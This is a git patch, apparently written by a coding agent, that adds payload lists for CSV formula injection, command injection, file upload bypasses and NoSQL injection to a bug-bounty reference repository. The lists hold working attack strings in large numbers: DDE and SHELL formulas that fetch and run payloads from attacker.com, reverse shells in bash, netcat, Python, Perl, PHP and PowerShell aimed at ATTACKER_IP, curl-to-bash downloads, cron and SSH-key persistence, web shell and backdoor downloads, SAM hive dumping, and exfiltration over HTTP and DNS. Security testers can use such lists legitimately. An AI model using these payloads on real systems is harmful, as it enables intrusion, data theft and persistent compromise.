From 0a48c19312c2c60b02fd1d58ba70c42832b8a409 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Sun, 4 Jan 2026 19:45:07 +0000 Subject: [PATCH] Add NoSQL, CSV, File Upload vulnerabilities and enhance Command Injection Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com> --- CSV-Injection/README.md | 42 ++ CSV-Injection/csv-injection-payloads.txt | 328 +++++++++ .../command-injection-payloads.txt | 538 ++++++++++++++- File-Upload/README.md | 73 ++ File-Upload/file-upload-payloads.txt | 648 ++++++++++++++++++ NoSQL-Injection/README.md | 38 + NoSQL-Injection/nosql-injection-payloads.txt | 323 +++++++++ README.md | 5 +- 8 files changed, 1971 insertions(+), 24 deletions(-) create mode 100644 CSV-Injection/README.md create mode 100644 CSV-Injection/csv-injection-payloads.txt create mode 100644 File-Upload/README.md create mode 100644 File-Upload/file-upload-payloads.txt create mode 100644 NoSQL-Injection/README.md create mode 100644 NoSQL-Injection/nosql-injection-payloads.txt diff --git a/CSV-Injection/README.md b/CSV-Injection/README.md new file mode 100644 index 0000000..215c543 --- /dev/null +++ b/CSV-Injection/README.md @@ -0,0 +1,42 @@ +# CSV Injection (Formula Injection) + +## Description +CSV Injection (also known as Formula Injection) is a vulnerability that occurs when websites embed untrusted input inside CSV files. When a spreadsheet application (like Microsoft Excel, LibreOffice Calc, or Google Sheets) opens a CSV file containing malicious formulas, it may execute the formulas, leading to arbitrary command execution, information disclosure, or other attacks. + +## Common Attack Vectors +- Export functionality (user data, reports, analytics) +- Contact forms that export to CSV +- User profile data exports +- Order history exports +- Any feature that generates downloadable CSV files +- Import/Export features in CRM systems +- Billing and invoice downloads +- Survey results exports + +## Testing Approach +Submit formula characters (=, +, -, @, \t, \r) followed by commands or formulas in: +- Name fields +- Address fields +- Comment/description fields +- Any user-controllable data that might be exported to CSV + +## Risk Impact +- Remote code execution via DDE (Dynamic Data Exchange) +- Information disclosure (reading local files) +- SSRF (Server-Side Request Forgery) +- Credential theft +- Malware distribution + +## Common Vulnerable Patterns +- Direct export of user input to CSV without sanitization +- Missing CSV encoding/escaping +- Lack of formula character stripping +- Client-side only validation + +## Payloads +See `csv-injection-payloads.txt` for a comprehensive list of CSV injection payloads covering: +- Formula injection techniques +- DDE (Dynamic Data Exchange) attacks +- Command execution payloads +- Data exfiltration methods +- Multi-application compatibility diff --git a/CSV-Injection/csv-injection-payloads.txt b/CSV-Injection/csv-injection-payloads.txt new file mode 100644 index 0000000..25fd8a3 --- /dev/null +++ b/CSV-Injection/csv-injection-payloads.txt @@ -0,0 +1,328 @@ +# CSV Injection Payloads (Formula Injection) - 2020-2025 + +# ============================ +# Basic Formula Injection +# ============================ + +# Equals Formula +=1+1 +=1+2+3 +=SUM(1+1) +=2+5+cmd|' /C calc'!A0 +="string" +=CMD|' /C powershell IEX(wget attacker.com/shell.ps1)'!A0 + +# Plus Formula ++1+1 ++cmd|'/c calc'!A1 ++DDE("cmd";"/c calc";"!") + +# Minus Formula +-1+1 +-cmd|'/c calc'!A1 +-DDE("cmd";"/c calc";"!") + +# At Symbol Formula +@sum(1+1) +@SUM(A1:A10) + +# Tab Character + =1+1 + +1+1 + -1+1 + @sum(1+1) + +# Carriage Return +=1+1 ++=1+1 + +# ============================ +# DDE (Dynamic Data Exchange) Attacks +# ============================ + +# Basic DDE - Command Execution +=DDE("cmd";"/c calc";"!") +=DDE("cmd";"/c calc.exe";"!") +=DDE("cmd";"/c powershell";"!") +=DDE("cmd";"/c cmd";"!") + +# DDE - File Reading +=DDE("cmd";"/c type C:\Windows\System32\drivers\etc\hosts";"!") +=DDE("cmd";"/c type C:\Users\*\Desktop\passwords.txt";"!") +=DDE("cmd";"/c dir C:\";"!") + +# DDE - Information Disclosure +=DDE("cmd";"/c whoami";"!") +=DDE("cmd";"/c hostname";"!") +=DDE("cmd";"/c ipconfig";"!") +=DDE("cmd";"/c net user";"!") +=DDE("cmd";"/c systeminfo";"!") + +# DDE - Data Exfiltration +=DDE("cmd";"/c curl http://attacker.com?data=$(whoami)";"!") +=DDE("cmd";"/c powershell -c Invoke-WebRequest -Uri http://attacker.com -Method POST -Body (Get-Content C:\passwords.txt)";"!") +=DDE("cmd";"/c certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe";"!") + +# DDE - Reverse Shell +=DDE("cmd";"/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";"!") + +# ============================ +# Excel HYPERLINK Function +# ============================ + +=HYPERLINK("http://attacker.com","Click here") +=HYPERLINK("http://attacker.com?cookie="&A1,"Click") +=HYPERLINK("file:///C:/Windows/System32/calc.exe","Click to update") +=HYPERLINK(CONCATENATE("http://attacker.com/",A1),"Link") + +# ============================ +# IMPORTXML / WEBSERVICE Functions +# ============================ + +=IMPORTXML("http://attacker.com/xxe.xml","//data") +=IMPORTXML(CONCAT("http://attacker.com?data=",A1),"//data") +=WEBSERVICE("http://attacker.com") +=WEBSERVICE(CONCAT("http://attacker.com?leak=",A1)) + +# ============================ +# Obfuscation Techniques +# ============================ + +# Using CHAR function to hide commands +=CHAR(61)&"DDE(""cmd"";""/c calc"";""!"")" +=CONCATENATE(CHAR(61),"1+1") +=CHAR(61)&CHAR(68)&CHAR(68)&CHAR(69)&"(""cmd"";""/c calc"";""!"")" + +# Using string concatenation +="="&"1+1" +=CONCATENATE("=","1+1") +="="&"DDE(""cmd"";""/c calc"";""!"")" + +# Double encoding +==1+1 +=+1+1 += =1+1 + +# Null byte injection +=1+1%00 +=DDE("cmd";"/c calc";"!")%00 + +# Unicode characters +=1+1 +﹢1+1 +⁼1+1 + +# Whitespace obfuscation += 1+1 += 1+1 += 1+1 + +# ============================ +# Cross-Application Payloads +# ============================ + +# LibreOffice Calc +=SHELL("calc") +=SHELL("gnome-calculator") +=SHELL("xterm -e bash") +=SHELL("wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh") + +# Google Sheets +=IMAGE("http://attacker.com/track.png") +=IMAGE("https://attacker.com/"&A1) +=IMPORTDATA("http://attacker.com/data.csv") +=IMPORTFEED("http://attacker.com/feed") +=IMPORTHTML("http://attacker.com","table",1) +=IMPORTRANGE("spreadsheet-id","Sheet1!A1:B10") + +# ============================ +# Advanced Techniques (2023-2025) +# ============================ + +# Chained formulas +=IF(A1="admin",DDE("cmd";"/c calc";"!"),"safe") +=IF(ISNUMBER(SEARCH("admin",A1)),WEBSERVICE("http://attacker.com"),"") + +# Nested functions +=SUM(DDE("cmd";"/c calc";"!")) +=CONCATENATE(DDE("cmd";"/c whoami";"!")) + +# Conditional execution +=IF(1=1,DDE("cmd";"/c calc";"!"),1) +=IFERROR(DDE("cmd";"/c calc";"!"),1) + +# ============================ +# Context-Aware Payloads +# ============================ + +# Name field +=DDE("cmd";"/c calc";"!") ++DDE("cmd";"/c calc";"!") +-DDE("cmd";"/c calc";"!") +@DDE("cmd";"/c calc";"!") + +# Email field +test@test.com=DDE("cmd";"/c calc";"!") +=WEBSERVICE("http://attacker.com")@test.com + +# Comment field +Great product! =DDE("cmd";"/c calc";"!") +Review: +cmd|'/c calc'!A1 + +# ============================ +# Payload Variations for WAF Bypass +# ============================ + +# Mixed case +=dDe("cmd";"/c calc";"!") +=DdE("cmd";"/c calc";"!") + +# Alternative quotes +=DDE('cmd';'/c calc';'!') +=DDE(`cmd`;`/c calc`;`!`) + +# Line breaks +=DDE("cmd"; +"/c calc"; +"!") + +# Tabs and spaces +=DDE( "cmd" ; "/c calc" ; "!" ) + +# ============================ +# Platform-Specific Payloads +# ============================ + +# Windows +=cmd|'/c calc'!A1 +=cmd|'/c powershell -c "Start-Process calc"'!A1 +=cmd|'/c mshta http://attacker.com/payload.hta'!A1 +=cmd|'/c certutil -urlcache -split -f http://attacker.com/bad.exe bad.exe && bad.exe'!A1 +=cmd|'/c wmic process call create "calc.exe"'!A1 +=cmd|'/c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'!A1 + +# Linux/Unix +=SHELL("calc") +=SHELL("xcalc") +=SHELL("xterm") +=SHELL("/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1") +=SHELL("curl http://attacker.com/shell.sh | bash") +=SHELL("nc attacker.com 4444 -e /bin/sh") + +# macOS +=SHELL("open /Applications/Calculator.app") +=SHELL("osascript -e 'tell application \"Calculator\" to activate'") +=SHELL("curl http://attacker.com/payload.sh | sh") + +# ============================ +# Data Exfiltration Payloads +# ============================ + +# Exfiltrate cell data +=WEBSERVICE("http://attacker.com?data="&A1) +=HYPERLINK("http://attacker.com?token="&B2,"Update") +=IMAGE("http://attacker.com/track.gif?user="&C3) + +# Exfiltrate multiple cells +=WEBSERVICE("http://attacker.com?u="&A1&"&p="&B1) +=CONCATENATE("http://attacker.com/",A1,"/",B1,"/",C1) + +# ============================ +# Denial of Service +# ============================ + +# Resource exhaustion +=SUM(1:1048576) +=IF(A1<>"",$A$1:$XFD$1048576,"") +=VLOOKUP(A1,$A$1:$XFD$1048576,1,FALSE) + +# Circular references +=A1 +(in cell A1 itself, causes circular reference) + +# ============================ +# Remote File Inclusion +# ============================ + +=IMPORTXML("http://attacker.com/xxe.xml","//data") +=IMPORTHTML("http://attacker.com/malicious.html","table",1) +=IMPORTFEED("http://attacker.com/rss") +=IMPORTDATA("http://attacker.com/data.txt") + +# ============================ +# XXE via CSV (when parsed as XML internally) +# ============================ + +=IMPORTXML("data:text/xml,]>&xxe;","//foo") + +# ============================ +# Social Engineering Payloads +# ============================ + +Please verify your account: =HYPERLINK("http://phishing.com","Click Here") +Congratulations! You won: =DDE("cmd";"/c calc";"!") +URGENT - Security Update Required =cmd|'/c powershell iex(wget attacker.com/malware.ps1)'!A1 +Invoice #12345 =WEBSERVICE("http://attacker.com/log") + +# ============================ +# Polyglot Payloads +# ============================ + +=1+1';alert(document.domain)// +=DDE("cmd";"/c calc";"!")||' ++cmd|'/c calc'!A1'"> + +# ============================ +# Null Cell Reference +# ============================ + +=A0 +=DDE("cmd";"/c calc";"!")!A0 +=cmd|'/c powershell'!A0 + +# ============================ +# Format Confusion +# ============================ + +"=1+1" +'=1+1 +`=1+1 +´=1+1 + +# ============================ +# Batch CSV Injection (Multiple Rows) +# ============================ + +# First row normal, second row malicious +Normal User,user@email.com,Regular Comment +Hacker,=DDE("cmd";"/c calc";"!"),Malicious + +# ============================ +# CSV Injection in Different Contexts +# ============================ + +# In URL parameters +?name==DDE("cmd";"/c calc";"!") +?search=+cmd|'/c calc'!A1 + +# In JSON (if converted to CSV) +{"name": "=DDE(\"cmd\";\"/c calc\";\"!\")"} + +# In XML (if converted to CSV) +=cmd|'/c calc'!A1 + +# ============================ +# Time-Delayed Payloads +# ============================ + +=IF(NOW()>DATE(2024,1,1),DDE("cmd";"/c calc";"!"),1) +=IF(TODAY()=WEEKDAY(1),WEBSERVICE("http://attacker.com"),1) + +# ============================ +# Modern Framework Specific (2024-2025) +# ============================ + +# When exported from web applications +=WEBSERVICE(CONCAT("http://attacker.com/?cookie=",CELL("filename"))) +=HYPERLINK("javascript:alert(document.cookie)","click") +=@SUM(A1:A1000)*WEBSERVICE("http://attacker.com") diff --git a/Command-Injection/command-injection-payloads.txt b/Command-Injection/command-injection-payloads.txt index f7e58d1..74d787c 100644 --- a/Command-Injection/command-injection-payloads.txt +++ b/Command-Injection/command-injection-payloads.txt @@ -1,6 +1,10 @@ -# Command Injection Payloads +# Command Injection Payloads (2020-2025 Enhanced Bug Bounty Edition) -# Basic command injection +# ============================ +# BASIC COMMAND INJECTION +# ============================ + +# Command Separators ; ls | ls || ls @@ -8,73 +12,561 @@ && ls `ls` $(ls) +%0a ls +\n ls -# Chained commands +# Chained Commands ; whoami | whoami || whoami & whoami && whoami -# Command substitution +# Command Substitution `whoami` $(whoami) ;`whoami` ;$(whoami) +$((whoami)) -# File operations +# ============================ +# LINUX/UNIX COMMANDS +# ============================ + +# File Operations ; cat /etc/passwd | cat /etc/passwd ; cat /etc/shadow | cat /etc/shadow -; ls -la +; ls -la / | ls -la / +; head -n 50 /etc/passwd +; tail -n 50 /var/log/auth.log -# Windows commands +# System Information +; uname -a +; hostname +; id +; whoami +; pwd +; env +; set +; printenv +; cat /proc/version +; cat /etc/issue +; cat /etc/*-release +; ifconfig +; ip addr +; route -n +; netstat -tulpn +; ps aux +; w +; last + +# File Discovery +; find / -name "*.conf" 2>/dev/null +; find / -name "config*" 2>/dev/null +; find / -name "*password*" 2>/dev/null +; find / -perm -4000 2>/dev/null +; locate password +; locate admin +; which gcc +; which python +; which perl + +# Reading Sensitive Files +; cat ~/.bash_history +; cat ~/.ssh/id_rsa +; cat ~/.ssh/authorized_keys +; cat /var/www/html/config.php +; cat /var/www/html/wp-config.php +; cat /etc/apache2/apache2.conf +; cat /etc/nginx/nginx.conf +; cat /root/.ssh/id_rsa + +# ============================ +# WINDOWS COMMANDS +# ============================ + +# Basic Commands & dir | dir +& dir C:\ & type C:\Windows\win.ini | type C:\boot.ini & whoami | net user +& hostname +& ipconfig +& systeminfo -# Time-based detection +# Windows System Info +& systeminfo +& wmic qfe list +& wmic logicaldisk get caption +& net user +& net localgroup administrators +& net user /domain +& net group /domain +& net group "Domain Admins" /domain +& tasklist +& netstat -ano +& ipconfig /all +& route print +& arp -a + +# Windows File Operations +& type C:\Users\Administrator\Desktop\passwords.txt +& dir C:\Users\ +& dir C:\inetpub\wwwroot\ +& type C:\Windows\System32\drivers\etc\hosts +& reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run +& reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" + +# PowerShell Commands +& powershell Get-Process +& powershell Get-Service +& powershell Get-NetIPConfiguration +& powershell Get-ComputerInfo +& powershell Get-LocalUser +& powershell Get-LocalGroup +& powershell Get-ChildItem C:\ -Recurse -Include *.txt,*.doc,*.pdf -ErrorAction SilentlyContinue +& powershell -c "Get-Content C:\Users\Administrator\Desktop\passwords.txt" + +# Windows Credential Dumping +& reg save HKLM\SAM C:\temp\sam.hive +& reg save HKLM\SYSTEM C:\temp\system.hive +& reg save HKLM\SECURITY C:\temp\security.hive + +# ============================ +# TIME-BASED BLIND INJECTION +# ============================ + +# Linux ; sleep 5 | sleep 5 -& ping -n 5 127.0.0.1 -| ping -c 5 127.0.0.1 -; timeout 5 -& timeout /t 5 +|| sleep 5 +& sleep 5 +&& sleep 5 +; sleep 10 +`sleep 5` +$(sleep 5) -# Output redirection +# Using ping for delay +; ping -c 5 127.0.0.1 +| ping -c 10 127.0.0.1 +|| ping -c 5 localhost + +# Windows +& timeout 5 +| timeout 5 +& timeout /t 5 +& ping -n 5 127.0.0.1 +| ping -n 10 127.0.0.1 +& ping 127.0.0.1 -n 5 > nul + +# ============================ +# OUTPUT REDIRECTION & EXFILTRATION +# ============================ + +# Output to File ; ls > /tmp/output.txt | ls > /tmp/output.txt & dir > C:\temp\output.txt +; whoami > /var/www/html/whoami.txt +; cat /etc/passwd > /tmp/passwd.txt -# URL encoded -%3B%20ls -%7C%20ls +# Append to File +; ls >> /tmp/output.txt +; whoami >> /var/www/html/info.txt + +# Error Redirection +; ls 2>&1 +; cat /etc/shadow 2>/dev/null +; find / -name "*.conf" 2>/dev/null + +# Data Exfiltration via HTTP +; curl http://attacker.com?data=$(whoami) +; wget http://attacker.com/exfil?data=$(cat /etc/passwd | base64) +; curl -d "data=$(cat /etc/passwd)" http://attacker.com/collect +& powershell -c "Invoke-WebRequest -Uri http://attacker.com?data=$(whoami) -Method GET" + +# DNS Exfiltration +; nslookup $(whoami).attacker.com +; dig $(whoami).attacker.com +; host $(whoami).attacker.com + +# ============================ +# ENCODING & OBFUSCATION +# ============================ + +# URL Encoding +%3B%20whoami +%7C%20whoami %26%20whoami +%0a%20whoami +%0d%0a%20whoami + +# Double URL Encoding +%253B%2520whoami +%257C%2520whoami + +# Unicode Encoding +\u003b whoami + +# Hex Encoding +\x3b whoami +\x0a whoami + +# Octal Encoding +\073 whoami + +# ============================ +# NEWLINE INJECTION +# ============================ -# Newline injection %0a whoami %0d%0a whoami \n whoami \r\n whoami +\r whoami +%0awhoami +%0d%0awhoami -# Spaces bypass +# ============================ +# SPACE BYPASS TECHNIQUES +# ============================ + +# No Space ;cat& /dev/tcp/YOUR_IP/PORT 0>&1 -& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);" +# Wildcards +/???/??t /???/??ss?? +/bin/c?t /etc/p?sswd +/bin/ca* /etc/pass* +/b*n/c*t /e*c/p*wd + +# Variable Substitution +$PATH +$HOME +$PWD +${PATH:0:1} +echo ${LS_COLORS:0:1} + +# Concatenation +ca''t /etc/passwd +c""at /etc/passwd +c\a\t /etc/passwd + +# Case Manipulation (Bash) +$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") + +# ============================ +# COMMAND SUBSTITUTION VARIATIONS +# ============================ + +`whoami` +$(whoami) +$((whoami)) +`echo $(whoami)` +$(echo `whoami`) +a=$(whoami);echo $a +a=`whoami`;echo $a + +# ============================ +# REVERSE SHELLS (FOR AUTHORIZED TESTING) +# ============================ + +# Bash Reverse Shell +; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 +| bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 +; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' +; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196 + +# NC Reverse Shell +; nc -e /bin/sh ATTACKER_IP PORT +; nc ATTACKER_IP PORT -e /bin/bash +; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f + +# Python Reverse Shell +; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' + +# Perl Reverse Shell +; perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + +# PHP Reverse Shell +; php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' + +# Ruby Reverse Shell +; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + +# Telnet Reverse Shell +; telnet ATTACKER_IP PORT | /bin/bash | telnet ATTACKER_IP SECOND_PORT + +# Windows PowerShell Reverse Shell +& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" + +# Windows CMD Reverse Shell +& powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1') + +# ============================ +# REMOTE CODE EXECUTION (RCE) +# ============================ + +# Download and Execute +; curl http://attacker.com/shell.sh | bash +; wget http://attacker.com/shell.sh -O- | bash +; curl http://attacker.com/exploit.py | python +& certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe +& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" + +# Execute In-Memory +; echo "curl http://attacker.com/payload" | bash +& powershell -enc BASE64_ENCODED_COMMAND + +# ============================ +# SYMBOLIC LINK ATTACKS +# ============================ + +# Create Symlink to Sensitive Files +; ln -s /etc/passwd /var/www/html/passwd.txt +; ln -s /etc/shadow /tmp/shadow.txt +; ln -s /root/.ssh/id_rsa /var/www/html/key.txt +; ln -s /var/www/html/config.php /tmp/config.txt + +# Symlink to Directory +; ln -s /etc/ /var/www/html/etc +; ln -s /root/ /tmp/root +; ln -s / /var/www/html/rootfs + +# Symlink Overwrite +; ln -sf /etc/passwd /var/www/html/index.php +; ln -sf /dev/null /var/log/access.log + +# Race Condition with Symlink +; ln -s /etc/passwd target && cat target +; ln -s /etc/shadow /tmp/link && cat /tmp/link + +# Symlink Arbitrary File Read +; ln -s /etc/passwd public_html/passwd +; ln -s ~/.ssh/id_rsa web/key + +# Symlink in Archive Extraction (Zip Slip) +; ln -s /etc/passwd malicious_link +; tar -czf payload.tar.gz malicious_link + +# ============================ +# BLIND COMMAND INJECTION DETECTION +# ============================ + +# Time-Based Detection +|| sleep 5 +& sleep 5 & +; ping -c 5 127.0.0.1 +| timeout 5 + +# Out-of-Band (OOB) Detection +; curl http://burpcollaborator.net +; wget http://attacker.com/ping +; nslookup attacker.com +; ping attacker.com -c 1 +& nslookup attacker.com + +# DNS-Based Detection +; nslookup $(whoami).attacker.com +; dig $(whoami).attacker.com +; host $(hostname).attacker.com + +# HTTP-Based Detection +; curl http://attacker.com/?id=injection +; wget http://attacker.com/?test=injection + +# ============================ +# POLYGLOT COMMAND INJECTION +# ============================ + +test;whoami +test|whoami +test||whoami +test&whoami +test&&whoami +test`whoami` +test$(whoami) +test%0awhoami +test\nwhoami + +# ============================ +# ADVANCED FILTER BYPASSES (2023-2025) +# ============================ + +# Whitespace Alternatives +cat/etc/passwd +{cat,/etc/passwd} +X=$'cat\x20/etc/passwd'&&$X + +# Null Byte +cat /etc/passwd%00 +whoami%00 + +# Comment Injection +cat /etc/passwd#comment +whoami#comment +cat /etc/passwd//comment + +# Using $PATH +${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd + +# Using $HOME +$HOME/../../etc/passwd + +# Glob Characters +/???/c?t /???/p?ssw? + +# ============================ +# WAF/IDS BYPASS +# ============================ + +# Case Variations +Cat /etc/passwd +CAT /etc/passwd +cAt /etc/passwd + +# Using Tabs +cat%09/etc/passwd + +# Using Line Feed +cat%0a/etc/passwd + +# Combining Techniques +c''a''t${IFS}/e''t''c/p''a''s''s''w''d + +# ============================ +# CONTEXT-SPECIFIC INJECTIONS +# ============================ + +# In Email Field +user@domain.com; whoami +user@domain.com| whoami +user@domain.com`whoami` + +# In Filename +file.txt; whoami +file.txt| cat /etc/passwd +$(whoami).txt + +# In URL +http://example.com/page?id=1; whoami +http://example.com/page?id=1| cat /etc/passwd + +# ============================ +# CRON JOB INJECTION +# ============================ + +# Persistent Access +; (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") | crontab - +; echo "* * * * * curl http://attacker.com/shell.sh | bash" | crontab - + +# ============================ +# SSH KEY INJECTION +# ============================ + +# Add SSH Key for Persistence +; echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys +; mkdir -p ~/.ssh && echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys + +# ============================ +# BACKDOOR INSTALLATION +# ============================ + +# Web Shell Upload +; curl http://attacker.com/shell.php -o /var/www/html/shell.php +; wget http://attacker.com/backdoor.php -O /var/www/html/bd.php + +# Binary Download and Execute +; curl http://attacker.com/backdoor -o /tmp/bd && chmod +x /tmp/bd && /tmp/bd +; wget http://attacker.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware & + +# ============================ +# PRIVILEGE ESCALATION CHECKS +# ============================ + +# SUID Binaries +; find / -perm -4000 -type f 2>/dev/null +; find / -perm -u=s -type f 2>/dev/null + +# Sudo Permissions +; sudo -l +; cat /etc/sudoers + +# Writable Files +; find / -writable -type f 2>/dev/null +; find / -perm -222 -type f 2>/dev/null + +# ============================ +# LOG POISONING +# ============================ + +# Apache/Nginx Log Poisoning +; echo "" >> /var/log/apache2/access.log +; echo "" >> /var/log/nginx/access.log + +# ============================ +# ENVIRONMENT VARIABLE MANIPULATION +# ============================ + +; export PATH=/tmp:$PATH +; echo $PATH +; printenv + +# ============================ +# MODERN TECHNIQUES (2024-2025) +# ============================ + +# Abusing Built-in Features +; source <(curl -s http://attacker.com/script.sh) +; eval "$(curl -s http://attacker.com/cmd.txt)" + +# JavaScript Command Injection (Node.js) +; node -e "require('child_process').exec('whoami')" + +# Using Alternative Shells +; sh -c whoami +; bash -c whoami +; zsh -c whoami +; ksh -c whoami + +# Exploiting Interpreters +; python -c "import os;os.system('whoami')" +; perl -e 'system("whoami")' +; ruby -e 'system("whoami")' diff --git a/File-Upload/README.md b/File-Upload/README.md new file mode 100644 index 0000000..9c11d3d --- /dev/null +++ b/File-Upload/README.md @@ -0,0 +1,73 @@ +# File Upload Vulnerabilities + +## Description +File upload vulnerabilities occur when a web application allows users to upload files without properly validating the file type, content, or destination. Attackers can exploit these vulnerabilities to upload malicious files, leading to remote code execution (RCE), arbitrary file read/write, cross-site scripting (XSS), and other attacks. + +## Common Attack Vectors +- Profile picture upload +- Document upload features +- Resume/CV upload +- Image galleries +- File sharing functionality +- Import/export features +- Backup/restore functionality +- Plugin/theme upload (CMS) +- Attachment features + +## Testing Approach +Test various file upload bypasses: +- Extension bypasses (double extensions, case variations, null bytes) +- Content-Type manipulation +- Magic byte manipulation +- Polyglot files (valid image + valid code) +- Archive file manipulation (zip, tar) +- Path traversal in filenames +- File overwrite attacks +- XXE via SVG/XML files + +## Risk Impact +- **Remote Code Execution (RCE)** - Upload and execute web shells +- **Cross-Site Scripting (XSS)** - Upload HTML/SVG files with JavaScript +- **Path Traversal** - Overwrite critical files +- **Denial of Service** - Upload large files, zip bombs +- **Information Disclosure** - Read sensitive files +- **Defacement** - Overwrite web pages +- **Malware Distribution** - Host malicious files + +## Common Vulnerable Patterns +- Blacklist-based file type validation (instead of whitelist) +- Client-side only validation +- Inadequate Content-Type checking +- Missing magic byte validation +- Predictable upload paths +- Executable permissions on upload directories +- Lack of file size limits +- No antivirus scanning + +## File Extensions to Test +**Web Shells & RCE:** +- PHP: `.php`, `.php3`, `.php4`, `.php5`, `.php7`, `.phtml`, `.phar`, `.phpt`, `.pgif`, `.pht` +- ASP: `.asp`, `.aspx`, `.asa`, `.asax`, `.ascx`, `.ashx`, `.asmx`, `.cer`, `.config` +- JSP: `.jsp`, `.jspx`, `.jsw`, `.jsv`, `.jspf` +- Perl: `.pl`, `.pm`, `.cgi`, `.lib` +- Python: `.py`, `.pyc`, `.pyw` +- Ruby: `.rb`, `.rbw` +- Other: `.shtml`, `.shtm`, `.phar`, `.inc` + +**Script Files:** +- `.js`, `.vbs`, `.bat`, `.cmd`, `.ps1`, `.sh` + +**Server Config:** +- `.htaccess`, `.htpasswd`, `.web.config`, `.conf` + +## Payloads +See `file-upload-payloads.txt` for comprehensive payloads including: +- Extension bypass techniques +- Content-Type bypasses +- Magic byte manipulation +- Polyglot file examples +- Web shell payloads (PHP, ASP, JSP) +- XSS via file upload +- Path traversal in filenames +- XXE via SVG/XML uploads +- Archive-based attacks diff --git a/File-Upload/file-upload-payloads.txt b/File-Upload/file-upload-payloads.txt new file mode 100644 index 0000000..12274e9 --- /dev/null +++ b/File-Upload/file-upload-payloads.txt @@ -0,0 +1,648 @@ +# File Upload Vulnerability Payloads (2020-2025 Bug Bounty Tested) + +# ============================ +# FILE EXTENSION BYPASSES +# ============================ + +# Double Extensions +shell.php.jpg +shell.php.png +shell.php.gif +shell.php.pdf +shell.php.txt +shell.jpg.php +shell.png.php +exploit.asp.jpg +exploit.aspx.png +backdoor.jsp.gif + +# Case Variations +shell.PHP +shell.PhP +shell.pHp +shell.Php +shell.PHp +shell.ASP +shell.ASPX +shell.AsP +shell.JSP + +# Null Byte Injection (older systems) +shell.php%00.jpg +shell.php%00.png +shell.php\x00.jpg +shell.asp%00.gif +exploit.jsp%00.pdf + +# Special Characters +shell.php..... +shell.php%20 +shell.php%0a +shell.php%00 +shell.php%0d%0a +shell.php::$DATA +shell.php::$INDEX_ALLOCATION + +# Alternate Extensions (PHP) +shell.php3 +shell.php4 +shell.php5 +shell.php7 +shell.phtml +shell.phar +shell.phpt +shell.pgif +shell.pht +shell.inc +shell.hphp +shell.ctp + +# Alternate Extensions (ASP/ASPX) +shell.asp +shell.aspx +shell.asa +shell.asax +shell.ascx +shell.ashx +shell.asmx +shell.cer +shell.config +shell.soap +shell.rem + +# Alternate Extensions (JSP) +shell.jsp +shell.jspx +shell.jsw +shell.jsv +shell.jspf + +# Other Language Extensions +shell.pl +shell.pm +shell.cgi +shell.py +shell.pyc +shell.rb +shell.rbw 